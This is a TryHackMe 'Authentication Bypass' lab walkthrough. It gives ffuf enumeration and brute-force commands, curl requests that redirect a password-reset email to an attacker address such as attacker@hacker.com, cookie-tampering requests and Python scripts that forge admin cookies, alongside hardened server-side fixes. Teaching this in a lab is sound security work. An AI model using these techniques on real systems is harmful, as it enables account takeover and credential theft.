Web Fundamentals | Authentication Bypass
Hi there, I’m glad to see you here. In this article, we’ll work through the “Authentication Bypass” room in TryHackMe together. In some sections, I’ll give a brief overview of the subject. Don’t forget! You must always research to learn more. I hope it will be helpful for you. Let’s start!
Contents:
- What is “Authentication Bypass” ?
- Username Enumeration
- Brute Force
- Logic Flaw
- Cookie Tampering
What is “Authentication Bypass” ?
An attacker gains access to an application, service, or device with the privileges of an authorized or privileged user by evading or circumventing an authentication mechanism. The attacker is therefore able to access protected data without authentication ever having taken place.
This refers to an attacker gaining access equivalent to an authenticated user without ever going through an authentication procedure. This is usually the result of the attacker using an unexpected access procedure that does not go through the proper checkpoints where authentication should occur.
Username Enumeration
Website error messages are a great resource for building a list of valid usernames.
When we access the customer portal, we are asked for some information in order to register. Let’s enter the “admin” username and fill in the rest of the required information.
As a result, you’ll see we get the error “An account with this username already exists”.
We can use this error message as an oracle to produce a list of valid usernames already signed up on the system with the ffuf tool: FUZZ is replaced by each word from the list, and -mr keeps only the responses whose body matches the error text.
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.176.6/customers/signup -mr "An account with this username already exists" -c
To get the wordlist, go to the GitHub repository via the link below:
According to our wordlist, we can see that there are 3 different users registered on the system, and an HTTP 200 (OK) response code is returned for each of them.
Answer the questions below
❓Q1: What is the username starting with si*** ?
📣A1: simon
❓Q2: What is the username starting with st*** ?
📣A2: steve
❓Q3: What is the username starting with ro**** ?
📣A3: robert
Brute Force
A brute force attack is an automated process that tries a list of commonly used passwords against either a single username or, like in our case, a list of usernames.
When we access the login page, we are asked to enter username and password information as usual.
At this stage, we can try to perform a brute force attack by creating a wordlist containing the usernames we discovered in the previous step.
Then we can use ffuf with two wordlists to find the passwords that correspond to the usernames. W1 is replaced by each username and W2 by each password; with two wordlists ffuf defaults to clusterbomb mode, so every combination is tried. A failed login returns HTTP 200 with the form again, so -fc 200 filters those responses out and only the combination that produced a different status code, the successful login, is shown.
ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.176.6/customers/login -fc 200 -c
BINGO! As a result of this, we found the password of the user named “steve”.
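The two ffuf runs above, rewritten as one script so the logic behind the flags is visible. This is an added example, not code from the original article or from TryHackMe. To run offline it talks to a constructed fake target (the accounts, passwords and page texts in it are made up; only "steve" has a password that appears in the mini password list, mirroring the single hit above); the http_target helper, the base URL and the form field names are assumptions that you would point at a lab box you are allowed to test.

```python
import itertools
import urllib.error
import urllib.parse
import urllib.request

# Constructed stand-in for the target so the script runs offline: a few accounts and the
# two endpoints the article fuzzes. Only "steve" has a password that appears in the
# password list below, mirroring the single hit the ffuf run produced.
FAKE_ACCOUNTS = {"admin": "n0t-1n-l1st", "simon": "Q9!xvb#2", "steve": "thunder", "robert": "zZ7-kq-Pp"}
SIGNUP_ERROR = "An account with this username already exists"

def fake_target(path, data):
    """Return (status_code, body) the way the signup and login pages answer."""
    if path == "/customers/signup":
        if data.get("username") in FAKE_ACCOUNTS:
            return 200, "<p class='error'>" + SIGNUP_ERROR + "</p>"
        return 200, "<p>Account created</p>"
    if path == "/customers/login":
        if FAKE_ACCOUNTS.get(data.get("username")) == data.get("password"):
            return 302, ""  # a successful login redirects; that is what -fc 200 lets through
        return 200, "<p class='error'>Invalid credentials</p>"
    return 404, ""

class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow redirects so a 302 on login is reported as 302, not as the page it leads to."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None

def http_target(base_url):
    """Build a sender that POSTs a form to base_url+path (assumed helper for a lab box you may test)."""
    opener = urllib.request.build_opener(_NoRedirect)
    def send(path, data):
        body = urllib.parse.urlencode(data).encode()
        req = urllib.request.Request(base_url + path, data=body,
                                     headers={"Content-Type": "application/x-www-form-urlencoded"})
        try:
            with opener.open(req) as resp:
                return resp.status, resp.read().decode(errors="replace")
        except urllib.error.HTTPError as err:  # 3xx/4xx/5xx land here because redirects are refused
            return err.code, err.read().decode(errors="replace")
    return send

def enumerate_usernames(candidates, send=fake_target):
    """Username enumeration (the ffuf -mr step): the signup page leaks existence via its error text."""
    found = []
    for name in candidates:
        _, body = send("/customers/signup",
                       {"username": name, "email": "x", "password": "x", "cpassword": "x"})
        if SIGNUP_ERROR in body:
            found.append(name)
    return found

def brute_force(usernames, passwords, send=fake_target):
    """Brute force (the ffuf -fc 200 step). Two wordlists in clusterbomb mode: every user is
    tried with every password, and a response that is not a 200 marks a successful login."""
    hits = []
    for user, password in itertools.product(usernames, passwords):
        status, _ = send("/customers/login", {"username": user, "password": password})
        if status != 200:
            hits.append((user, password))
    return hits

if __name__ == "__main__":
    names = ["simon", "alice", "steve", "robert", "bob"]          # constructed mini names.txt
    top_passwords = ["123456", "password", "thunder", "qwerty"]   # constructed mini password list
    valid = enumerate_usernames(names)
    print("valid usernames:", valid)                                # ['simon', 'steve', 'robert']
    print("credentials found:", brute_force(valid, top_passwords))  # [('steve', 'thunder')]
    # Against a live lab box: send = http_target("http://10.10.176.6"); enumerate_usernames(names, send)
```

The two checks are deliberately different oracles: enumeration keys on the response body, brute force on the status code, which is exactly why the first ffuf run uses -mr and the second -fc. Refusing redirects in http_target matters; if the client silently followed the 302, a successful login would also come back as a 200 and be filtered away.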
Answer the questions below
❓Q1: What is the valid username and password (format: username/password)?
📣A1: steve/*******
Logic Flaw
Sometimes authentication processes contain logic flaws. A logic flaw is when the typical logical path of an application is bypassed, circumvented or manipulated by an attacker.
Let’s look at how we can use this method to reset a user’s password.
The password reset process asks for an email address; if we enter an arbitrary one, we get the error “Account not found from supplied email address”.
After this stage, we’ll continue on our way by using the email address of one of the users we discovered, robert.
Let’s enter robert as the username and then click the “Check Username” button.
As a result of this, we’ll be presented with a confirmation message that a password reset email will be sent to “robert@acmeitsupport.thm”.
In the second step of the reset email process, the username is submitted in a POST field to the web server, and the email address is sent in the query string request as a GET field.
Let’s reproduce the request the web page just made with curl, using the same URL, and examine the response.
curl 'http://10.10.176.6/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert'
# -H : Header
# -d : HTTP POST data
As you can see, a reset email has been sent to the email address “robert@acmeitsupport.thm”.
So, can we send a reset email to a different email address using the “robert” username? Let’s try it and see what happens!
curl 'http://10.10.176.6/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email=attacker@hacker.com'
# -H : Header
# -d : HTTP POST data
Perfect! The application checks the username but takes the destination address from whichever parameter is named “email”, and the one in the POST body overrides the one in the query string. This means we can redirect the reset email to any email address we want.
First of all, we can begin by creating a user on the system.
And then instead of sending the reset email to Robert’s email address, let’s redirect it to the email address of the user we created.
❗️The email address is in the format of:
👉🏼{username}@customer.acmeitsupport.thm
curl 'http://10.10.176.6/customers/reset?email=robert@acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email=test@customer.acmeitsupport.thm'
# -H : Header
# -d : HTTP POST data
Here it is! 😈
When we examine the ticket titled “Password Reset”, we can see a URL that allows us to automatically login to Robert’s account and then change his password from the “Your Account” page.
This secret must stay between the two of us, my friend!🤫
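The reset flaw, as an added example that is not part of the original article: a vulnerable handler beside a hardened one. The request parameter merging (query string first, POST body overriding on a clash) is an assumption about how the lab backend behaves, chosen because it reproduces what the curl requests above showed; the account table and the outbox are constructed.

```python
import secrets
from urllib.parse import parse_qs, urlsplit

# Constructed sample data: the only account the handlers know about, and an "outbox" that
# stands in for the mail server so we can see where the reset mail actually goes.
ACCOUNTS = {"robert": "robert@acmeitsupport.thm"}
OUTBOX = []

def merged_params(url, body):
    """Collect parameters the way a $_REQUEST-style lookup does (assumed backend behaviour):
    query-string values first, then POST-body values overriding them on a name clash."""
    params = {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}
    params.update({k: v[0] for k, v in parse_qs(body).items()})
    return params

def vulnerable_reset(url, body):
    """Step two of the reset flow as the lab behaves: the username is checked, but the
    destination address is taken from the request instead of from the account record."""
    p = merged_params(url, body)
    if p.get("username") not in ACCOUNTS or "email" not in p:
        return None
    OUTBOX.append((p["email"], "password reset link for " + p["username"]))
    return p["email"]            # who actually receives the reset mail

def fixed_reset(url, body):
    """Hardened version: the client may name the account, never the mailbox. The address is
    looked up server-side and a fresh single-use token is minted per request."""
    p = merged_params(url, body)
    email = ACCOUNTS.get(p.get("username", ""))
    if email is None:
        return None              # same response for unknown users avoids an enumeration oracle
    token = secrets.token_urlsafe(32)
    OUTBOX.append((email, "password reset link for " + p["username"] + " token=" + token))
    return email

if __name__ == "__main__":
    url = "http://10.10.176.6/customers/reset?email=robert%40acmeitsupport.thm"
    attack_body = "username=robert&email=test@customer.acmeitsupport.thm"
    print("vulnerable handler mails:", vulnerable_reset(url, attack_body))  # test@customer.acmeitsupport.thm
    print("fixed handler mails:     ", fixed_reset(url, attack_body))       # robert@acmeitsupport.thm
```

The fix is not "read the email from the query string instead": any client-supplied address is the bug. The server already knows where the account's mailbox is, so the client only gets to say which account, and the token that lands in that mailbox should be random, short-lived and invalidated on first use.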
Answer the questions below
❓Q1: What is the flag from Robert’s support ticket?
📣A1: ***{********************}
Cookie Tampering
Cookies are small files of information that a web server generates and sends to a web browser. Web browsers store the cookies they receive for a predetermined period of time, or for the length of a user’s session on a website.
Plain Text
The contents of some cookies can be in plain text, and it is obvious what they do. Take, for example, these cookies set after a successful login:
Request : curl http://10.10.176.6/cookie-test
Response : Not Logged In
Request : curl -H "Cookie: logged_in=true; admin=false" http://10.10.176.6/cookie-test
Response : Logged In As A User
Request : curl -H "Cookie: logged_in=true; admin=true" http://10.10.176.6/cookie-test
Response : Logged In As An Admin
We see one cookie (logged_in), which appears to control whether the user is currently logged in, and another (admin), which controls whether the visitor has admin privileges. The server trusts these client-supplied values, so if we change the contents of the cookies and resend the request, we change our privileges.
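The /cookie-test behaviour above as code, beside the fix, as an added example that is not from the original article or the lab. The vulnerable check reproduces the three exchanges shown; the hardened check is one common remedy (an HMAC-SHA256 tag over the cookie payload under a server-side key) and is my addition, with a constructed demo key.

```python
import base64
import binascii
import hashlib
import hmac

def parse_cookies(header):
    """Split a Cookie request header into a name->value dict (values kept verbatim)."""
    cookies = {}
    for part in (header or "").split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = value
    return cookies

def vulnerable_check(cookie_header):
    """/cookie-test as the lab behaves: the server believes whatever the client says."""
    c = parse_cookies(cookie_header)
    if c.get("logged_in") != "true":
        return "Not Logged In"
    return "Logged In As An Admin" if c.get("admin") == "true" else "Logged In As A User"

# Constructed key for the demo; a real deployment loads it from secret storage and rotates it.
SERVER_KEY = b"constructed-demo-key-do-not-reuse"

def make_session(role):
    """Server side: issue a cookie carrying the role plus an HMAC-SHA256 tag over it."""
    payload = role.encode()
    tag = hmac.new(SERVER_KEY, payload, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(payload).decode() + "." + base64.urlsafe_b64encode(tag).decode()

def hardened_check(cookie_header):
    """Same decision, but the role is only honoured if its tag verifies under the server key."""
    c = parse_cookies(cookie_header)
    session = c.get("session")
    if not session or "." not in session:
        return "Not Logged In"
    try:
        payload_b64, tag_b64 = session.split(".", 1)
        payload = base64.urlsafe_b64decode(payload_b64)
        tag = base64.urlsafe_b64decode(tag_b64)
    except (ValueError, binascii.Error):
        return "Not Logged In"
    expected = hmac.new(SERVER_KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):     # constant-time comparison
        return "Not Logged In"
    return "Logged In As An Admin" if payload == b"admin" else "Logged In As A User"

def forge_admin(cookie_value):
    """What an attacker can try against a signed cookie: swap the payload for 'admin', keep the old tag."""
    return base64.urlsafe_b64encode(b"admin").decode() + "." + cookie_value.split(".", 1)[1]

if __name__ == "__main__":
    print(vulnerable_check(""))                                   # Not Logged In
    print(vulnerable_check("logged_in=true; admin=false"))        # Logged In As A User
    print(vulnerable_check("logged_in=true; admin=true"))         # Logged In As An Admin
    user_cookie = make_session("user")
    print(hardened_check("session=" + user_cookie))               # Logged In As A User
    print(hardened_check("session=" + forge_admin(user_cookie)))  # Not Logged In
```

Signing stops tampering but not replay or reading: the payload is still visible to the client, so keep secrets out of it, and pair the tag with an expiry and HttpOnly/Secure flags. Storing only an opaque session ID in the cookie and the role server-side avoids the problem entirely.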
Answer the questions below
❓Q1: What is the flag from changing the plain text cookie values?
📣A1: ***{****************}
Hashing
Sometimes cookie values can look like a long string of random characters; these may be hashes, which are an irreversible representation of the original text. Here are some examples that you may come across:
👉🏼Original String : admin
🔑MD5
21232f297a57a5a743894a0e4a801fc3
🔑SHA-256
8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918
🔑SHA-512
c7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931dd472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ec
🔑SHA-1
d033e22ae348aeb5660fc2140aec35850c4da997
You can see above that the hash output from the same input string can significantly differ depending on the hash method in use. Even though the hash is irreversible, the same output is produced every time, which is helpful for us as services such as https://crackstation.net keep databases of billions of hashes and their original strings.
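A small version of what CrackStation does, as an added example that is not from the original article: hash every word of a wordlist under the four algorithms above, then reverse an unsalted cookie hash by lookup. The wordlist is constructed; hex length is only a hint for the algorithm, and a salted or keyed hash defeats this lookup entirely.

```python
import hashlib

ALGORITHMS = ("md5", "sha1", "sha256", "sha512")

def digests(text):
    """Hex digests of one string under the four algorithms the article lists."""
    data = text.encode()
    return {alg: hashlib.new(alg, data).hexdigest() for alg in ALGORITHMS}

def guess_algorithm(hex_hash):
    """Hex length is the usual first hint: 32=MD5, 40=SHA-1, 64=SHA-256, 128=SHA-512."""
    return {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}.get(len(hex_hash))

def build_lookup(words):
    """Precompute hash -> plaintext for a wordlist; a lookup service does this at billions scale."""
    table = {}
    for word in words:
        for hex_hash in digests(word).values():
            table[hex_hash] = word
    return table

def crack(hex_hash, table):
    """Reverse an unsalted hash by lookup; None when the plaintext is not in the wordlist."""
    return table.get(hex_hash.strip().lower())

if __name__ == "__main__":
    # constructed mini wordlist standing in for a real one such as SecLists
    words = ["admin", "password", "letmein", "guest", "123456"]
    table = build_lookup(words)
    cookie_value = "21232f297a57a5a743894a0e4a801fc3"   # the MD5 shown in the article
    print(guess_algorithm(cookie_value), "->", crack(cookie_value, table))   # md5 -> admin
    print(crack("d033e22ae348aeb5660fc2140aec35850c4da997", table))          # admin (SHA-1)
    print(crack("0" * 32, table))                                            # None
```

The lookup works because the hash is deterministic and unsalted: the same input always gives the same output, so one precomputation serves every target. A per-user salt, or better a keyed MAC as in the signed-cookie example, makes the table useless.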
❓Q2: What is the value of the md5 hash 3b2a1053e3270077456a79192070aa78 ?
📣A2: 463729
Encoding
Encoding is similar to hashing in that it creates what would seem to be a random string of text, but in fact, the encoding is reversible. So it begs the question, what is the point in encoding? Encoding allows us to convert binary data into human-readable text that can be easily and safely transmitted over mediums that only support plain text ASCII characters.
Common encoding types are base32 which converts binary data to the characters A-Z and 2–7, and base64 which converts using the characters a-z, A-Z, 0–9, +, / and the equals sign for padding.
Take the below data as an example which is set by the web server upon logging in:
Set-Cookie: session=eyJpZCI6MSwiYWRtaW4iOmZhbHNlfQ==; Max-Age=3600; Path=/
Base64-decoded, this string has the value {"id":1,"admin":false}. We can set the admin value to true and encode it back to base64, and sending that as our session cookie gives us admin access, because nothing ties the cookie’s contents to a server-side secret.
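The decode, flip and re-encode step above as code, as an added example that is not from the original article. It assumes the server serialises the session as compact JSON (no spaces) before base64-encoding it, which is what the cookie value on the page shows.

```python
import base64
import json

def decode_session(cookie_value):
    """Base64-decode a session cookie and parse the JSON inside."""
    return json.loads(base64.b64decode(cookie_value))

def encode_session(session):
    """Re-encode the way the server does: compact JSON (no spaces), then base64."""
    compact = json.dumps(session, separators=(",", ":"))
    return base64.b64encode(compact.encode()).decode()

def forge_admin_cookie(cookie_value):
    """Decode, flip the admin flag, re-encode. Works only because nothing binds the value to the server."""
    session = decode_session(cookie_value)
    session["admin"] = True
    return encode_session(session)

if __name__ == "__main__":
    original = "eyJpZCI6MSwiYWRtaW4iOmZhbHNlfQ=="   # the Set-Cookie value from the article
    print(decode_session(original))        # {'id': 1, 'admin': False}
    print(forge_admin_cookie(original))    # eyJpZCI6MSwiYWRtaW4iOnRydWV9
```

The tell-tale signs in the wild are a value made of the base64 alphabet, often ending in = padding, that decodes to readable JSON; base32 looks similar but uses only A-Z and 2-7. Encoding is not protection, so the same signed-cookie fix applies here as for the plain-text case.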
❓Q3: What is the base64 decoded value of VEhNe0JBU0U2NF9FTkNPRElOR30= ?
📣A3: ***{***************}
❓Q4: Encode the following value using base64 {"id":1,"admin":true}
📣A4: eyJpZCI6MSwiYWRtaW4iOnRydWV9
Congratulations! We have learned together how authentication bypass, one of the common web application vulnerabilities, is exploited through username enumeration, brute force, logic flaws and cookie tampering. 👊🏻
Thank you for your time. See you soon! Until that time.. Happy Hacking ❤
Resources:
https://capec.mitre.org/data/definitions/115.html
https://www.cloudflare.com/learning/privacy/what-are-cookies